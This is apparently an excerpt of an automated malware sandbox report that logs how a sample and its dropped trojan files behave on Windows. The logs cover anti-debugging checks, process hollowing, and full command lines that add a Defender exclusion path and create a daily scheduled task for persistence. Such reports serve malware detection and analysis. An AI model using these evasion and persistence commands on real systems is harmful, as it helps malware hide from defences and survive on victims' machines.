                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                      Source: C:\Users\user\Desktop\2jbMIxCFsK.exeCode function: 0_2_02E65908 GetModuleHandleA,GetProcAddress,lstrcpynA,lstrcpynA,lstrcpynA,FindFirstFileA,FindClose,lstrlenA,lstrcpynA,lstrlenA,lstrcpynA,0_2_02E65908
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 100000Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 99824Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 99708Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 99589Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 99478Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 99320Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 99166Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 98927Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 98725Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 98603Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 98483Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 98368Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 98260Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 98117Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 97989Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 97846Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 97719Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 97609Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 97496Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 97382Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 97274Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 97160Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 97035Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 96912Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 96772Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 96646Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 96522Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 96281Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 96059Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 95943Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 95818Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 95693Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 95568Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 95443Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 95318Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 95193Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 95055Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 94941Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 94818Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 94696Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 94582Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 94459Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 94334Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 94209Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 94084Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 93960Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 93844Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 99725Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 99616Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 99505Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 99382Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 99261Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 99148Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 99039Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 98907Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 98803Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                      Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeThread delayed: delay time: 60000
                      Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeThread delayed: delay time: 60000
                      Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeThread delayed: delay time: 922337203685477
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 922337203685477
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 100000
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 99349
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 99157
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 98999
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 98869
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 98758
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 98649
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 98531
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 98377
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 98238
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 98089
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 97963
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 97828
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 97713
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 97603
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 97479
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 97335
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 97079
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 96552
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 96360
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 96152
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 96008
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 95868
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 95747
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 95592
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 95416
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 95272
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 95135
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 95030
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 94898
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 94777
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 94635
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 94473
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 94153
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 99790
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 99586
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 99417
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 99297
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 99183
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 99076
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 98962
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 98850
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 98723
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 98333
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 98182
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 98071
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 97964
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 97854
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 97743
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 97635
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 97524
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 97417
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 97307
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 97197
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 97087
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 96979
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 96869
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 96759
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 96650
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 96540
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 96432
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 96323
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 96213
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 96103
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 95994
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 95881
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 95761
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 95640
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 95519
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 95386
                      Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeThread delayed: delay time: 922337203685477
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 922337203685477
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 100000
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 99886
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 99771
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 99632
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 99517
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 99376
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 98968
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 98832
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 98708
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 98583
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 98458
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 98333
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 98208
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 98083
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 97958
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 97833
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 97708
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 97583
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 97458
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 97333
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 97208
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 97083
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 96958
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 96833
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 96708
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 96560
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 96451
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 96297
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 96189
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 96068
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 95943
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 95818
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 95693
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 95568
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 95443
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 95318
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 95193
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 95068
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 94943
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 94818
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 94693
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 94568
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 94443
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 94318
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 94193
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 94068
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 93916
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 93660
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 93536
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 93411
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 93286
                      Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeThread delayed: delay time: 922337203685477
                      Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeThread delayed: delay time: 922337203685477
                      Source: C:\Users\Public\Libraries\lxsyrsiW.pifFile opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\dc-desktop-app-dropin\
                      Source: C:\Users\Public\Libraries\lxsyrsiW.pifFile opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\UIThemes\
                      Source: C:\Users\Public\Libraries\lxsyrsiW.pifFile opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\
                      Source: C:\Users\Public\Libraries\lxsyrsiW.pifFile opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\dc-desktop-app-dropin\1.0.0_1.0.0\
                      Source: C:\Users\Public\Libraries\lxsyrsiW.pifFile opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\
                      Source: C:\Users\Public\Libraries\lxsyrsiW.pifFile opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\
                      Source: 2jbMIxCFsK.exe, 00000000.00000002.2156227554.00000000005BE000.00000004.00000020.00020000.00000000.sdmp, 2jbMIxCFsK.exe, 00000000.00000002.2156227554.0000000000608000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                      Source: 2jbMIxCFsK.exe, 00000000.00000002.2156227554.0000000000608000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWC
                      Source: neworigin.exe, 00000009.00000002.2320882998.0000000000AC9000.00000004.00000020.00020000.00000000.sdmp, Wisrysxl.PIF, 00000016.00000002.2308974209.00000000005B1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                      Source: C:\Users\user\Desktop\2jbMIxCFsK.exeAPI call chain: ExitProcess graph end nodegraph_0-32436
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information queried: ProcessInformationJump to behavior

                      Anti Debugging

                      barindex
                      Source: C:\Users\user\Desktop\2jbMIxCFsK.exeCode function: 0_2_02E7F744 GetModuleHandleW,GetProcAddress,CheckRemoteDebuggerPresent,0_2_02E7F744
                      Source: C:\Users\user\Desktop\2jbMIxCFsK.exeProcess queried: DebugPortJump to behavior
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFProcess queried: DebugPort
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFProcess queried: DebugPort
                      Source: C:\Users\user\Desktop\2jbMIxCFsK.exeCode function: 0_2_02E7894C LoadLibraryW,GetProcAddress,FreeLibrary,0_2_02E7894C
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess token adjusted: DebugJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeProcess token adjusted: DebugJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                      Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeProcess token adjusted: Debug
                      Source: C:\Users\Public\Libraries\lxsyrsiW.pifCode function: 8_1_004015D7 SetUnhandledExceptionFilter,8_1_004015D7
                      Source: C:\Users\Public\Libraries\lxsyrsiW.pifCode function: 8_1_004015D7 SetUnhandledExceptionFilter,8_1_004015D7
                      Source: C:\Users\Public\Libraries\lxsyrsiW.pifCode function: 23_1_004015D7 SetUnhandledExceptionFilter,23_1_004015D7
                      Source: C:\Users\Public\Libraries\lxsyrsiW.pifCode function: 23_1_004015D7 SetUnhandledExceptionFilter,23_1_004015D7
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeMemory allocated: page read and write | page guardJump to behavior

                      HIPS / PFW / Operating System Protection Evasion

                      barindex
                      Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\ACCApi'
                      Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\ACCApi' Jump to behavior
                      Source: C:\Users\user\Desktop\2jbMIxCFsK.exeMemory allocated: C:\Users\Public\Libraries\lxsyrsiW.pif base: 400000 protect: page execute and read and writeJump to behavior
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFMemory allocated: C:\Users\Public\Libraries\lxsyrsiW.pif base: 400000 protect: page execute and read and write
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFMemory allocated: C:\Users\Public\Libraries\lxsyrsiW.pif base: 400000 protect: page execute and read and write
                      Source: C:\Windows\SysWOW64\esentutl.exeFile created: C:\Users\Public\alpha.pifJump to dropped file
                      Source: C:\Users\user\Desktop\2jbMIxCFsK.exeSection unmapped: C:\Users\Public\Libraries\lxsyrsiW.pif base address: 400000Jump to behavior
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFSection unmapped: C:\Windows\SysWOW64\timeout.exe base address: 400000
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFSection unmapped: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe base address: 400000
                      Source: C:\Users\user\Desktop\2jbMIxCFsK.exeMemory written: C:\Users\Public\Libraries\lxsyrsiW.pif base: 3B2008Jump to behavior
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFMemory written: C:\Users\Public\Libraries\lxsyrsiW.pif base: 3CC008
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFMemory written: C:\Users\Public\Libraries\lxsyrsiW.pif base: 3E8008
                      Source: C:\Users\user\Desktop\2jbMIxCFsK.exeProcess created: C:\Users\Public\Libraries\lxsyrsiW.pif C:\Users\Public\Libraries\lxsyrsiW.pifJump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\esentutl.exe C:\\Windows\\System32\\esentutl /y C:\\Windows\\System32\\cmd.exe /d C:\\Users\\Public\\alpha.pif /oJump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\esentutl.exe C:\\Windows\\System32\\esentutl /y C:\\Windows\\System32\\ping.exe /d C:\\Users\\Public\\xpha.pif /oJump to behavior
                      Source: C:\Users\Public\Libraries\lxsyrsiW.pifProcess created: C:\Users\user\AppData\Local\Temp\neworigin.exe "C:\Users\user\AppData\Local\Temp\neworigin.exe" Jump to behavior
                      Source: C:\Users\Public\Libraries\lxsyrsiW.pifProcess created: C:\Users\user\AppData\Local\Temp\server_BTC.exe "C:\Users\user\AppData\Local\Temp\server_BTC.exe" Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\ACCApi' Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "schtasks.exe" /create /tn AccSys /tr "C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe" /st 02:18 /du 23:59 /sc daily /ri 1 /fJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeProcess created: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe "C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe" Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\tmpBC1D.tmp.cmd""Jump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout 6
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFProcess created: C:\Users\Public\Libraries\lxsyrsiW.pif C:\Users\Public\Libraries\lxsyrsiW.pif
                      Source: C:\Users\Public\Libraries\lxsyrsiW.pifProcess created: C:\Users\user\AppData\Local\Temp\neworigin.exe "C:\Users\user\AppData\Local\Temp\neworigin.exe"
                      Source: C:\Users\Public\Libraries\lxsyrsiW.pifProcess created: C:\Users\user\AppData\Local\Temp\server_BTC.exe "C:\Users\user\AppData\Local\Temp\server_BTC.exe"
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFProcess created: C:\Users\Public\Libraries\lxsyrsiW.pif C:\Users\Public\Libraries\lxsyrsiW.pif
                      Source: C:\Users\Public\Libraries\lxsyrsiW.pifProcess created: C:\Users\user\AppData\Local\Temp\neworigin.exe "C:\Users\user\AppData\Local\Temp\neworigin.exe"
                      Source: C:\Users\Public\Libraries\lxsyrsiW.pifProcess created: C:\Users\user\AppData\Local\Temp\server_BTC.exe "C:\Users\user\AppData\Local\Temp\server_BTC.exe"
                      Source: C:\Users\user\Desktop\2jbMIxCFsK.exeCode function: GetModuleFileNameA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegQueryValueExA,RegQueryValueExA,RegCloseKey,lstrcpynA,GetThreadLocale,GetLocaleInfoA,lstrlenA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA,0_2_02E65ACC
                      Source: C:\Users\user\Desktop\2jbMIxCFsK.exeCode function: GetLocaleInfoA,0_2_02E6A7C4
                      Source: C:\Users\user\Desktop\2jbMIxCFsK.exeCode function: lstrcpynA,GetThreadLocale,GetLocaleInfoA,lstrlenA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA,0_2_02E65BD8
                      Source: C:\Users\user\Desktop\2jbMIxCFsK.exeCode function: GetLocaleInfoA,0_2_02E6A810
                      Source: C:\Windows\SysWOW64\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
                      Source: C:\Users\Public\Libraries\lxsyrsiW.pifQueries volume information: C:\ VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeQueries volume information: C:\Users\user\AppData\Local\Temp\neworigin.exe VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
